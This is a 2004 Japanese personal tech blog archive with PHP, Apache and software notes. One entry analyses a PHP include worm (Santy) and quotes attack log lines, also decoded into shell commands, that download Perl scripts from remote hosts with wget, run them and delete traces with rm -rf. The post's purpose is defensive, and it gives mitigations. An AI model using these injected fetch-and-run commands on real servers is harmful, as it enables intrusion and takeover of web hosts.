2004-12
| << 2004.12 >> | ||||||
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 | |
2004-12-29
[etc]ゴン太くん 
この井村さんの似顔絵は本当にそっくり。
[Devel]PHP Easter Eggs 
(via "週"記)
expose_php = Off にしていない状態で、任意のPHPスクリプトに対して以下のようにすると見られる。
- PHP_LOGO
hoge.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
- PHP_EGG (Nadiaという犬?)
hoge.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
- ZEND_LOGO
hoge.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
- PHP_CREDITS (phpinfo()似)
hoge.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
ソースを良く見ると ext/standard/info.h に定数が書いてありますね。
2004-12-28
[Computer]Thunderbird 1.0 日本語版に不具合があったらしい 
Thunderbird 1.0 日本語版 2004年12月28日13:00 リリース予定 (via オレンジニュース)
修正版が28日13:30に公開されました。
Mac OS版は別の不具合により、26日16:00に修正版が公開されています。
[Devel]Apache1とApache2のパフォーマンス比較 
Apache 1とApache 2のパフォーマンス比較 (via オレンジニュース)
Apache1.3系に乗り換えるべきか。
[Hatena]はてなで最近した回答 
- 1103859487 IE6とfloatとwidth:100%
- 1104101386 PowerPointで表記を正規化したい
- 1104197465 セレクトボックスのドロップダウン時の表示項目を増やしたい
2004-12-27
[Security]PHPの脆弱性を狙った攻撃? 
追記(04/12/28):Santy.C or Santy.E or PhpInclude.Worm と呼ばれるワームだと判明。include(),require()の不適切な使用による脆弱性を突きます。脆弱性の詳細と対処法はこちら。includeする前にチェックすればOKです。
追記(04/12/30):allow_url_fopen = Off で対処できる模様。*1
追記(05/01/05):上記では問題があるようです。個人的なメモと備忘録 allow_url_fopen を Off にするという対処の問題点について。対策は個人的なメモと備忘録 PHP サーバに感染するワームについてをご覧下さい。
PukiWikiの対策状況についてはPukiWiki-dev:BugTrack/771。
PHPの脆弱性を狙ったものかなあ。
IPが色々なので、リクエストを送っているのは被害者かも。
oo部は伏字。
oo.oo.ooo.ooo - - [26/Dec/2004:14:07:15 +0900] "GET /index.php?cmd=diff&page=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.1" 301 - "-" "LWP::Simple/5.65"
;の後ろで改行し、%20を半角スペースに置換すると、こんな感じ。
cd /tmp; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611111; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611113; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112; perl sess_189f0f0889555397a4de5485dd611112; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611114; rm -rf sess_189f0f0889555397a4de5485dd611113.* sess_189f0f0889555397a4de5485dd611114.* sess_189f0f0889555397a4de5485dd611112.*; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/tmp/; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/spool/mail/; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/mail/; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /usr/local/apache/proxy/; cd /var/tmp/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; cd /var/spool/mail/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; cd /var/mail/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; cd /usr/local/apache/proxy/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; rm -rf /tmp/sess_189f0f0889555397a4de5485dd611111* /var/tmp/sess_189f0f0889555397a4de5485dd611111* /var/spool/mail/sess_189f0f0889555397a4de5485dd611111* /var/mail/sess_189f0f0889555397a4de5485dd611111* /usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*
もう一件。
oo.oo.oo.oo - - [26/Dec/2004:10:35:55 +0900] "GET /index.php?cmd=diff&page=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 301 - "-" "LWP::Simple/5.803"
同じように処理するとこんな感じ。こちらは掃除しないみたい。
cd /tmp; wget www.visualcoders.net/spybot.txt; wget www.visualcoders.net/worm1.txt; wget www.visualcoders.net/php.txt; wget www.visualcoders.net/ownz.txt; wget www.visualcoders.net/zone.txt; perl spybot.txt; perl worm1.txt; perl ownz.txt; perl php.txt
以下妄想。
- GIF画像を
openさせるincludeさせる - 任意のコマンドをリモートから実行できるようになる
- Perlスクリプトをダウンロード
- Perlスクリプトを実行
- 次のサーバにリクエストを送る
関係がありそうな情報
- SecurityFocus HOME Mailing List: BugTraq
- vBulletin Community Forum - showthread attack attempt?
- vBulletin Community Forum - Security Warning - How they killed my vb
正直者なので、ひとまず以下を.htaccessかhttpd.confに。効果は気休め程度。
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP.* [NC]
RewriteRule .* - [F]
素性判明。後者はPerl.Santy.CというWormらしい。
こちらでは PhpInclude.Worm or Santy.e となっている。
続報。
2004-12-25
[Computer]Thunderbird 1.0 日本語版 
Thunderbird 1.0 日本語版リリース!
Becky!2からの振り分け設定移行ツールもちょっとだけ改良してみました。
2004-12-24
[Server]Nagios 2.0b1 リリース 
Nagios 2.0b1 がリリースされました。
メジャーバージョンアップなので要チェック。
2004-12-23
[Interface]光受容細胞 
[教えて!goo] 人間の目はどのくらいの画素数に相当するのですか?
これに限らず、ruehasという方の回答はとっても丁寧で面白い。
[etc]SONY取扱説明書ダウンロードサービス 
94年の商品でもスキャン画像じゃなくてPDFなところが凄い。
[Unix]Linux上でMacバイナリ除去 
macutils内のmacsaveを使う。
apt-get install macutils
データフォークのみを取り出す。
cat hoge | macsave -d
ヘッダのみを除去する場合はtailでもOK。
tail +129c hoge > hoge.new
[Movie]iPodファンが自主制作したCM 
『iPod』ファンが自主制作したCM、ウェブで話題に (via 今日の戯言 ChangeLog)
完成度高っ!
2004-12-20
[Devel]eAccelerator 0.9.1 
eAccelerator 0.9.1
PHPアクセラレーター。Turck MMCache for PHP の後継ソフトウェア。
Notes: First release from eAccelerator with patches for PHP5. This package should compile under PHP4 and PHP5
[Devel]Devel 
hiddenタグ値を変更「HTML Source Code Explorer Bar」 (via オレンジニュース)
PHP::Perlinfo - phpinfo() 風に perl の情報を表示 : NDO::Weblog
[etc]音効さん 
結局、コントラバスの弦を外し、それを松ヤニを付けた皮手袋で縦に引っ張って 音を出したのですが、ゴジラも驚いたり悲しんだりしますので、その音を基礎に、 電気チェーンソーの音などを混ぜて作りました。
【ことばをめぐる】(020529)ターザン,安野光雅,松沢哲郎,マルティネ,二重分節(言語の)
映画に出てくるターザンの「アーアーアー」という雄叫びは、人間の声ではなく、 当初は「フクロウの声だの何だのを録音し、逆回しにしたりして合成したもの」
レッドキングの声をスロ−にすると、ラドンの声になります。ジャミラの声は 赤ん坊の泣き声です。ガメラはシャッタ−の開閉音だったはず。
その名も「祐次郎パンチ」。畳一枚ほどの広さにクジラの肉をつるし、 コブシで2000回叩いて録った。現在でも劇映画で使用される“究極のパンチ音”だ。
[etc]「都会で少年犯罪が増え凶悪化している」は完全なデタラメ 
Passion For The Future: なぜ「少年」は犯罪に走ったのか
"There are three kinds of lies: lies, damned lies, and statistics."
2004-12-19
[etc]コピーできない紙 
2004-12-18
[Computer]ここ最近気になったソフト 
- RegExpSel
- PickBack
- Web Map (via Y's memo)
- 3D-tcpdump (via Y's memo)
- SlightTaskManager (via Passion For The Future)
- Microsoft Office Word Viewer 2003
Microsoft Office Excel Viewer 2003 (via 窓の杜) - Dan Ritchies home page (via 窓の杜)
- SepPDF (via OnlineSoft VersionUp.info)
- IExpress Wizard
2004-12-17
[Devel]PHP4.3.10でエラー 
PukiWikiのエラーログ*2が半日で30MByteになってました 
エラー
unpack(): Type H: outside of string on /var/www/html/lib/func.php line 298
該当箇所
// ページ名のエンコード
function encode($key)
{
return ($key == '') ? '' : strtoupper(join('', unpack('H*0', $key)));
}
pack.cの4.3.9→4.3.10のdiffを取ってみると下記のような箇所があり、ここでinputposが-1になっているため、エラーが出ているみたいです。
@@ -820,6 +832,10 @@
}
inputpos += size;
+ if (inputpos < 0) {
+ php_error_docref(NULL TSRMLS_CC, E_WARNING, "Type %c: outside of string", type);
+ inputpos = 0;
+ }
} else if (arg < 0) {
/* Reached end of input for '*' repeater */
break;
運用上は特に問題ないみたいなので、php_error_docrefの行をコメントアウトしちゃいました (ダメ人間)
追記(04/12/22):PHP 4.3.10 Release Announcement
のCAN-2004-1018が原因で修正された箇所かも。
関連:SecuriTeam.com ™ (Multiple Vulnerabilities within PHP 4/5 (pack, unpack, safe_mode_exec_dir, safe_mode, realpath, unserialize))
追記(04/12/30):PukiWiki-dev:BugTrack/767で検討中の模様。
こんな感じに対処するようにとのことです。CVS版は修正済み。
--- func.php.orig 2004-08-07 00:39:52.000000000 +0900
+++ func.php 2004-12-30 16:47:06.000000000 +0900
@@ -243,7 +243,7 @@
// ページ名のエンコード
function encode($key)
{
- return ($key == '') ? '' : strtoupper(join('', unpack('H*0', $key)));
+ return ($key == '') ? '' : strtoupper(bin2hex($key));
}
// ページ名のデコード
- (反応はや!)
Posted by henoheno at 2004-12-30 (木) 14:05
- えへへ。年末暇なもんで
Posted by きゅーこん at 2004-12-30 (木) 16:27
2004-12-16
[Devel]Turck MMCache for PHP の後継 
eAccelerator (via PHP-J.com ブログ)
PHPアクセラレーター Turck MMCache for PHP の後継ソフトウェア。
期待してます。ただ、READMEがソフト名を置換しただけになっているため、意味不明気味。
foreachが早くなったとか。
PHPに深刻なセキュリティ・ホール,リモートからコードを実行される : IT Pro ニュースもあるのでアップグレードは必須。
2004-12-15
[Devel]If-Modified-Sinceに対応する 
モジュール版PHPで「If-Modified-Since」に対応する
2004-12-14
[Word]もじる・よじる・ねじる→捩る 
もじる・よじる・ねじるは全部「捩る」と書く。*3
すじるは「捩」の大を犬にした漢字?
[Movie]鉄人28号 
鉄人28号 公式サイト (via TECHSIDE.NET)
こんなに重さの感じられない3Dを堂々と公開する東映って一体・・・。
カレーパンのうたを見習って欲しい。
[Image]雲の上の橋 
世界一高い橋、雲間の343メートル 仏南部ミヨー - asahi.com : 国際 (via TECHSIDE.NET)
モンサンミシェルも良かったなあ。
2004-12-11
[Web]Google検索コマンド 
Google検索コマンドと演算子一覧/Web検索! メタサーチ/
2004-12-10
[Word](A若しくはB)又はC 
【ことばをめぐる】(010421)命令表現,ものとする,こと(命令)
[Devel]alt属性とtitle属性 
[Word]尊敬 謙譲 
あいかわらずビジネスメールが苦手。いまそかり。
[Movie]カレーパンのうた 
絶妙ナンセンス。
2004-12-08
[Word]ビリッケツ 
ビリの語源は未詳であるが、「尻(しり)」が転訛して「ひり」となり、 びりになったとする説が有力とされる。
つまり、「ビリッケツ」は感動の再会。
[Computer]Computer 
アメリカではHTMLメールが一般的らしい (via オレンジニュース)
IBM、PC事業売却に向けて交渉を開始--米紙報道 - CNET Japan
ThinkPadのクオリティーが下がるかも。
[Devel]テンポラリファイルを確実に消す方法 
テンポラリファイルを確実に消す方法 (Landscape - エンジニアのメモ)
open 直後に unlink して、そのまま使いつづける
2004-12-03
[etc]ニンテンドーDSの「DS」の本当の意味 
ニンテンドーDSの「DS」の本当の意味 (via オレンジニュース)
納得。
2004-12-02
[Word]難読に潜む音便変化 
太夫を「たゆう」と読む理由。*4
[Trivia]振り仮名のルビと宝石のルビー 
rubyタグを見たときに何故rubiではないのか不思議だったけど、ようやく解決。
[Word]おじゃまたくし 
とうもころし。
[Security]緊急 Internet Explorer 用の累積的なセキュリティ更新プログラム 
Internet Explorer 用の累積的なセキュリティ更新プログラム (889293) (MS04-040)
おとなもこどもも、おねーさんも。
2004-12-01
[etc]訴状を見ていないのでコメントできない 
訴状を見ていないのでコメントできない - 解散宣言・「正しい日本語を守る会」
届くまでに2週間程度かかるので。
[Computer]SCSI機器においてのターミネータの必要性 
SCSIターミネーター (via はてな)
「ザッパ〜ン」は言い得て妙。
